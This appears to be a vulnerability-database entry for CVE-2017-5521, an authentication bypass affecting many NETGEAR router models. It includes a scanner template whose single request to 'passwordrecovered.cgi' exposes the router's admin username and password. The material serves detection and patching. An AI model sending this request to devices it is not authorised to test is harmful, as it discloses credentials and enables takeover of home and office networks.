CVE-2017-5521: NETGEAR Routers - Authentication Bypass

2025-08-01 NETGEAR Routers PoC Public

Description

NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices are susceptible to authentication bypass via simple crafted requests to the web management server.

PoC

id: CVE-2017-5521

info:
  name: NETGEAR Routers - Authentication Bypass
  author: princechaddha
  severity: high
  description: |
    NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices are susceptible to authentication bypass via simple crafted requests to the web management server.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized configuration changes, network compromise, and potential exposure of sensitive information.
  remediation: |
    Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability.
  reference:
    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/
    - http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2017-5521
    - https://www.exploit-db.com/exploits/41205/
    - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2017-5521
    cwe-id: CWE-200
    epss-score: 0.89353
    epss-percentile: 0.99774
    cpe: cpe:2.3:o:netgear:r6200_firmware:1.0.1.56_1.0.43:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: netgear
    product: r6200_firmware
  tags: cve,cve2017,auth-bypass,netgear,router,kev,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/passwordrecovered.cgi?id={{rand_base(5)}}"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "right\">Router\\s*Admin\\s*Username<"
          - "right\">Router\\s*Admin\\s*Password<"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022002072918fa406faa324a06f34c94099b47863a5fcb0c07560cc1d97557e266bb02200cb2e97d939b6835d1e2b75a06164ea5e2fd48e8d75549b92cac90878185d0c4:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities